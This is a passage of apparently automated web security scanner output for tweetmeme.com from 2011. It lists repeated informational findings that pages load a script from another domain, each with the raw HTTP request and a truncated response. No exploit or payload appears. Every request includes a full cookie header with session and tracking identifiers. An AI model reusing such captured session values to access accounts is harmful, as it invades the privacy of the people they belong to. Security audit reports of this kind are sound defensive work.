Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:59:05 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0086700916290283
X-Served-In: 0.043781995773315
X-Served-By: ded2060
Content-Length: 56619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twe
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.415. http://tweetmeme.com/page/2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/page/2

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /page/2 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:55:54 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0074641704559326
X-Served-In: 0.29885697364807
X-Served-By: ded2061
Content-Length: 55553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twe
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.416. http://tweetmeme.com/page/3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/page/3

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /page/3 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:56:49 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0053110122680664
X-Served-In: 2.419842004776
X-Served-By: h00
Content-Length: 55833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twe
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.417. http://tweetmeme.com/page/4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/page/4

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /page/4 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:57:24 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0039119720458984
X-Served-In: 0.047711849212646
X-Served-By: h01
Content-Length: 55139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twe
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.418. http://tweetmeme.com/page/5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/page/5

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /page/5 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:57:29 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0048031806945801
X-Served-In: 2.2458288669586
X-Served-By: h01
Content-Length: 55429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twe
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.419. http://tweetmeme.com/page/6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/page/6

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /page/6 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:58:37 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0046608448028564
X-Served-In: 0.045732021331787
X-Served-By: h01
Content-Length: 54615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twe
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.420. http://tweetmeme.com/page/7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/page/7

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /page/7 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:58:48 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0044929981231689
X-Served-In: 0.049485921859741
X-Served-By: h00
Content-Length: 56069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twe
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.421. http://tweetmeme.com/page/8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/page/8

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /page/8 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:58:56 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0071430206298828
X-Served-In: 0.092781066894531
X-Served-By: ded2059
Content-Length: 55960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twe
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.422. http://tweetmeme.com/page/9 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/page/9

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /page/9 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:59:01 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0069260597229004
X-Served-In: 0.043330907821655
X-Served-By: h00
Content-Length: 55916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twe
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.423. http://tweetmeme.com/story/3703235206/office-365-for-education-leapfrogging-the-competition-whymicrosoft previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/story/3703235206/office-365-for-education-leapfrogging-the-competition-whymicrosoft

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /story/3703235206/office-365-for-education-leapfrogging-the-competition-whymicrosoft HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:41:51 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0031750202178955
X-Served-In: 1.0388720035553
X-Served-By: h03
Content-Length: 41934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Off
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.424. http://tweetmeme.com/story/3829040762/i-me-mine-the-unholy-trinity-of-ayn-rand-tomfoolery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/story/3829040762/i-me-mine-the-unholy-trinity-of-ayn-rand-tomfoolery

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /story/3829040762/i-me-mine-the-unholy-trinity-of-ayn-rand-tomfoolery HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:44:41 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.004019021987915
X-Served-In: 3.8936800956726
X-Served-By: h03
Content-Length: 41729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
I M
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.425. http://tweetmeme.com/story/3829268752/video-smack-fest-2011-in-queens-ny-2-girls-go-head-to-head-slapping-the-ish-out-each-other-for-2-000 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/story/3829268752/video-smack-fest-2011-in-queens-ny-2-girls-go-head-to-head-slapping-the-ish-out-each-other-for-2-000

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /story/3829268752/video-smack-fest-2011-in-queens-ny-2-girls-go-head-to-head-slapping-the-ish-out-each-other-for-2-000 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:43:47 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0056359767913818
X-Served-In: 1.0372290611267
X-Served-By: ded2059
Content-Length: 41951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Vid
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.426. http://tweetmeme.com/story/3829489042/inhabitats-week-in-green-self-sustaining-airships-turbine-base-jumpers-and-the-saharas-solar-oasis-engadget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/story/3829489042/inhabitats-week-in-green-self-sustaining-airships-turbine-base-jumpers-and-the-saharas-solar-oasis-engadget

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /story/3829489042/inhabitats-week-in-green-self-sustaining-airships-turbine-base-jumpers-and-the-saharas-solar-oasis-engadget HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:44:06 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0042719841003418
X-Served-In: 1.5734810829163
X-Served-By: ded2059
Content-Length: 42332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Inh
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.427. http://tweetmeme.com/story/3829652883/ny-jets-qb-picks-his-nose-wipes-it-on-teammate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/story/3829652883/ny-jets-qb-picks-his-nose-wipes-it-on-teammate

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /story/3829652883/ny-jets-qb-picks-his-nose-wipes-it-on-teammate HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:43:24 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0037190914154053
X-Served-In: 2.9209001064301
X-Served-By: ded2059
Content-Length: 38113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
NY
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.428. http://tweetmeme.com/story/3829698133/fear-this-says-the-pirate-bay-hinting-at-a-new-music-site previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/story/3829698133/fear-this-says-the-pirate-bay-hinting-at-a-new-music-site

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /story/3829698133/fear-this-says-the-pirate-bay-hinting-at-a-new-music-site HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:42:53 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0060100555419922
X-Served-In: 1.5006999969482
X-Served-By: h00
Content-Length: 41316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
&qu
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.429. http://tweetmeme.com/story/3829806161/the-associated-press-fitness-guru-jack-lalanne-96-dies-at-calif-home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/story/3829806161/the-associated-press-fitness-guru-jack-lalanne-96-dies-at-calif-home

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /story/3829806161/the-associated-press-fitness-guru-jack-lalanne-96-dies-at-calif-home HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:43:15 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0043668746948242
X-Served-In: 2.3485450744629
X-Served-By: ded2060
Content-Length: 41970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
The
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.430. http://tweetmeme.com/story/3829851328/kevin-durant-mendenhall-what-r-u-doing-son-twitvid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/story/3829851328/kevin-durant-mendenhall-what-r-u-doing-son-twitvid

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /story/3829851328/kevin-durant-mendenhall-what-r-u-doing-son-twitvid HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
